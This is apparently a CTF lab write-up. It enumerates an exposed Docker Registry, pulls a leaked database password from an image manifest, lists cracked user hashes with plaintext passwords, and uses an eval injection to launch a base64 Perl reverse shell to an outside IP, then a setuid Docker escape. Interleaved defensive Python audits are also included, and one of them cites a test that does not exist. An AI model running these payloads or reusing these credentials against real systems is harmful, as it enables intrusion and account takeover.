Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-08 13:08 GMT
Nmap scan report for ip-10-10-190-94.eu-west-1.compute.internal (10.10.190.94)
Host is up (0.0010s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
3306/tcp open mysql MySQL 5.7.40
| mysql-info:
| Protocol: 10
| Version: 5.7.40
| Thread ID: 3
| Capabilities flags: 65535
| Some Capabilities: LongColumnFlag, Speaks41ProtocolOld, FoundRows, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, InteractiveClient, LongPassword, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SwitchToSSLAfterHandshake, Support41Auth, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: ZnA%+[cWq,1.\x108\x19&Fk\x05
|_ Auth Plugin Name: 79
5000/tcp open http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
8080/tcp open http Node.js (Express middleware)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Login
MAC Address: 02:D7:B1:19:0F:4F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.01 seconds

Port 5000 is the Docker Registry API; see HackTricks for the protocol details.
Then curl it:
curl -s http://10.10.190.94:5000/v2/_catalog


curl -s http://10.10.190.94:5000/v2/umbrella/timetracking/tags/list
List the tags.

curl -s http://10.10.190.94:5000/v2/umbrella/timetracking/manifests/latest

Fetch the manifest for the details:

{
"v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"node\",\"app.js\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":null},\"container\":\"527e55a70a337461e3615c779b0ad035e0860201e4745821c5f3bc4dcd7e6ef9\",\"container_config\":{\"Hostname\":\"527e55a70a33\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"ExposedPorts\":{\"8080/tcp\":{}},\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\",\"NODE_VERSION=19.3.0\",\"YARN_VERSION=1.22.19\",\"DB_HOST=db\",\"DB_USER=root\",\"DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5\",\"DB_DATABASE=timetracking\",\"LOG_FILE=/logs/tt.log\"],\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) \",\"CMD [\\\"node\\\" \\\"app.js\\\"]\"],\"Image\":\"sha256:039f3deb094d2931ed42571037e473a5e2daa6fd1192aa1be80298ed61b110f1\",\"Volumes\":null,\"WorkingDir\":\"/usr/src/app\",\"Entrypoint\":[\"docker-entrypoint.sh\"],\"OnBuild\":null,\"Labels\":{}},\"created\":\"2022-12-22T10:03:08.042002316Z\",\"docker_version\":\"20.10.17\",\"id\":\"7aec279d6e756678a51a8f075db1f0a053546364bcf5455f482870cef3b924b4\",\"os\":\"linux\",\"parent\":\"47c36cf308f072d4b86c63dbd2933d1a49bf7adb87b0e43579d9c7f5e6830ab8\",\"throwaway\":true}"

Found in the cf.
mysql -h 10.10.190.94 -u root -p for the remote connection; next is probably UDF privilege escalation.
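The manifest above shows how a secret (DB_PASS) ends up baked into an image's config and readable by anyone who can reach the registry. The following is an added example, not code from the writeup or from the drg.py tool it uses: a Python audit script for your own registry that walks the same three endpoints (_catalog, tags/list, manifests) and flags environment variables in schema-1 manifests whose names look like credentials. The in-memory FAKE_REGISTRY, the placeholder password value, the SECRET_NAME pattern and all function names are mine; http_fetch is the only part that talks to a real registry.

```python
import json
import re
import urllib.request

# Constructed in-memory stand-in for a registry answering the three Docker
# Registry v2 endpoints used in the writeup. Values are placeholders, not the
# real image's data.
FAKE_REGISTRY = {
    "/v2/_catalog": {"repositories": ["umbrella/timetracking"]},
    "/v2/umbrella/timetracking/tags/list": {
        "name": "umbrella/timetracking", "tags": ["latest"]},
    "/v2/umbrella/timetracking/manifests/latest": {
        "schemaVersion": 1,
        "history": [{"v1Compatibility": json.dumps({
            "config": {"Env": [
                "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                "NODE_VERSION=19.3.0",
                "DB_HOST=db",
                "DB_USER=root",
                "DB_PASS=placeholder-not-the-real-password",
                "LOG_FILE=/logs/tt.log",
            ]},
            # schema-1 manifests repeat the same Env under container_config
            "container_config": {"Env": ["DB_PASS=placeholder-not-the-real-password"]},
        })}],
    },
}


def fake_fetch(path):
    """GET stand-in used by the demo: returns the constructed JSON for a path."""
    return FAKE_REGISTRY[path]


def http_fetch(base_url):
    """Build a real GET function for base_url, asking for schema-1 manifests
    (those carry v1Compatibility with the image config inline)."""
    def fetch(path):
        req = urllib.request.Request(
            base_url.rstrip("/") + path,
            headers={"Accept": "application/vnd.docker.distribution.manifest.v1+json"})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.loads(resp.read().decode())
    return fetch


# Variable names that usually hold credentials; tune for your environment.
SECRET_NAME = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)


def secret_env_vars(manifest):
    """Return the distinct NAME=value entries baked into a schema-1 manifest's
    layer configs whose NAME looks like a secret. Schema-2 manifests carry no
    'history' (the config lives in a separate blob) and yield nothing here."""
    hits = []
    for entry in manifest.get("history", []):
        cfg = json.loads(entry["v1Compatibility"])
        for section in ("config", "container_config"):
            for kv in (cfg.get(section) or {}).get("Env") or []:
                name = kv.split("=", 1)[0]
                if SECRET_NAME.search(name) and kv not in hits:
                    hits.append(kv)
    return hits


def scan_registry(fetch):
    """Walk _catalog -> tags/list -> manifests and map image:tag to the
    secret-looking env vars found in it."""
    findings = {}
    for repo in fetch("/v2/_catalog")["repositories"]:
        for tag in fetch(f"/v2/{repo}/tags/list")["tags"]:
            hits = secret_env_vars(fetch(f"/v2/{repo}/manifests/{tag}"))
            if hits:
                findings[f"{repo}:{tag}"] = hits
    return findings


if __name__ == "__main__":
    # Demo against the constructed registry; swap in http_fetch("http://registry:5000")
    # to audit a registry you operate. Values are redacted on output on purpose.
    for image, hits in scan_registry(fake_fetch).items():
        print(image)
        for kv in hits:
            print("  ", kv.split("=", 1)[0], "= <redacted>")
```

A hit here means the secret is part of the image itself, so rotating it and moving it to a runtime mechanism (env_file, compose secrets, a vault) is the fix; putting the registry behind authentication limits who can read the manifest but does not remove the secret from the layers.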


In the end I went with unlimited trial :)

claire-r:2ac9cb7dc02b3c0083eb70898e549b63:Password1
chris-r:0d107d09f5bbe40cade3de5c71e9e9b7:letmein
jill-v:4a04890400b5d7bac101baace5d7e994:sandwich
barry-b:d5c0607301ad5d5c1528962a83992ac8:sunshine1

Hashes cracked.
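The rows above are unsalted MD5 hashes of common passwords, which is why they fall to a wordlist immediately. The following is an added example in Python, not part of the writeup: the upgrade-on-login pattern an application owner would use to get rid of such rows without forcing a reset. A legacy 32-hex row is verified once with MD5 and immediately rewritten as salted PBKDF2-HMAC-SHA256; the LEGACY_ROWS dict, the iteration count, the storage format string and the function names are my choices.

```python
import hashlib
import hmac
import os
import re

# Two user:md5 rows copied from the list above; the plaintexts are only used
# by the demo to exercise the upgrade path.
LEGACY_ROWS = {
    "claire-r": "2ac9cb7dc02b3c0083eb70898e549b63",
    "chris-r": "0d107d09f5bbe40cade3de5c71e9e9b7",
}

MD5_HEX = re.compile(r"^[0-9a-f]{32}$")
ITERATIONS = 600_000  # assumed work factor; raise as hardware allows


def is_legacy_md5(stored):
    """A bare 32-hex-digit string is an unsalted MD5 row from the old scheme."""
    return bool(MD5_HEX.match(stored))


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iters>$<salt hex>$<dk hex>' with a fresh random salt."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify(password, stored):
    """Constant-time check against either the legacy or the new format."""
    if is_legacy_md5(stored):
        return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored)
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def login(users, username, password):
    """Verify the password and, if the row is still legacy MD5, replace it in place.
    Returns (ok, upgraded)."""
    stored = users.get(username)
    if stored is None or not verify(password, stored):
        return False, False
    if is_legacy_md5(stored):
        users[username] = hash_password(password)
        return True, True
    return True, False


if __name__ == "__main__":
    users = dict(LEGACY_ROWS)
    print(login(users, "claire-r", "Password1"))  # (True, True): row upgraded
    print(users["claire-r"][:24], "...")
    print(login(users, "claire-r", "Password1"))  # (True, False): already upgraded
```

Rows that never log in again stay MD5, so pair this with a deadline after which remaining legacy rows are invalidated, and keep the new format self-describing (algorithm and iteration count in the string) so the work factor can be raised later.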

Can't log in to the web page; try SSH.

…still can't get in. Try this tool and re-collect the Docker information:

python ../drg.py http://10.10.190.94 --list
python ../drg.py http://10.10.190.94 --dump umbrella/timetracking
Go into the downloaded files:
for i in *.tar.gz; do tar -xzvf "$i"; done  # remember to delete these later

Argh!!!

claire-r@ctf:~$ whoami
claire-r
claire-r@ctf:~$

Typed it wrong, damn it.

At this point the guess is:

version: '3.3'
services:
  db:
    image: mysql:5.7
    restart: always
    environment:
      MYSQL_DATABASE: 'timetracking'
      MYSQL_ROOT_PASSWORD: 'Ng1-f3!Pe7-e5?Nf3xe5'
    ports:
      - '3306:3306'
    volumes:
      - ./db:/docker-entrypoint-initdb.d
  app:
    image: umbrella/timetracking:latest
    restart: always
    ports:
      - '8080:8080'
    volumes:
      - ./logs:/logs

Use the remote API to cp or run other commands into the logs directory to escalate privileges.

Uh, eval, obviously.

require('child_process').exec('echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTcuNi4xNzMiOyRwPTk5OTk7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygic2ggLWkiKTt9Oyc= | base64 -d | bash')

Ugh.
The base64 contains Perl:

perl -e 'use Socket;$i="10.17.6.173";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

Next, the Docker escape.
Earlier I saw that logs is mounted.

The first connection was to the host itself; node runs inside Docker.

Shared state?
Then chown, chmod +s
Root straight away.
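Both the compose file guessed above and the escape just described come down to the same configuration mistakes: the root password inline in the compose file, the database port published on every interface, and a host directory (./logs) bind-mounted read-write into a container that runs as root, so a file the container creates and marks setuid is a root-owned setuid file on the host. The following is an added example in Python, not part of the writeup: an audit of a parsed compose file for exactly those patterns. COMPOSE is the inferred file as a dict (what yaml.safe_load() would return), with the real password replaced by a placeholder; the finding codes, SECRET_KEY pattern and function names are mine.

```python
import re

# The compose file inferred in the writeup, as the dict yaml.safe_load() would
# return for it (constructed here; the real root password is replaced by a placeholder).
COMPOSE = {
    "version": "3.3",
    "services": {
        "db": {
            "image": "mysql:5.7",
            "restart": "always",
            "environment": {
                "MYSQL_DATABASE": "timetracking",
                "MYSQL_ROOT_PASSWORD": "placeholder-not-the-real-password",
            },
            "ports": ["3306:3306"],
            "volumes": ["./db:/docker-entrypoint-initdb.d"],
        },
        "app": {
            "image": "umbrella/timetracking:latest",
            "restart": "always",
            "ports": ["8080:8080"],
            "volumes": ["./logs:/logs"],
        },
    },
}

# Environment keys that usually carry credentials; tune for your environment.
SECRET_KEY = re.compile(r"PASS(WORD)?|SECRET|TOKEN|KEY", re.I)


def parse_volume(spec):
    """Short volume syntax 'src:dst[:opts]' -> (src, dst, read_only).
    A src starting with '.' or '/' is a host bind mount; anything else is a named volume."""
    parts = spec.split(":")
    src = parts[0]
    dst = parts[1] if len(parts) > 1 else None
    opts = parts[2].split(",") if len(parts) > 2 else []
    return src, dst, "ro" in opts


def audit_service(name, svc):
    """Return a list of (code, detail) findings for one service."""
    findings = []
    env = svc.get("environment") or {}
    if isinstance(env, list):  # compose also allows ["KEY=value", ...]
        env = dict(kv.split("=", 1) for kv in env)
    for key in env:
        if SECRET_KEY.search(key):
            findings.append(("inline-secret", key))
    for spec in svc.get("volumes") or []:
        src, dst, ro = parse_volume(spec)
        if src.startswith((".", "/")) and not ro:
            # Writable host path: files the container writes are root-owned on the
            # host unless the service sets user:, and setuid bits survive the mount.
            findings.append(("rw-bind-mount", f"{src}->{dst}"))
    if "user" not in svc:
        findings.append(("runs-as-root", name))
    for p in svc.get("ports") or []:
        p = str(p)
        if ":" in p and not p.startswith("127.0.0.1:"):
            findings.append(("port-on-all-interfaces", p))
    return findings


def audit(compose):
    """Map each service name to its findings."""
    return {name: audit_service(name, svc)
            for name, svc in compose.get("services", {}).items()}


if __name__ == "__main__":
    for name, findings in audit(COMPOSE).items():
        for code, detail in findings:
            print(f"{name}: {code}: {detail}")
```

The corresponding fixes are: set user: on the app service so nothing it writes is root-owned, mount ./logs read-only or replace it with a named volume (or keep the host directory on a filesystem mounted nosuid), bind the database port to 127.0.0.1 or drop the ports: entry and rely on the compose network, and move MYSQL_ROOT_PASSWORD into an env_file or compose secrets. The last assertion in the test shows a service with those changes producing no findings.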

🐮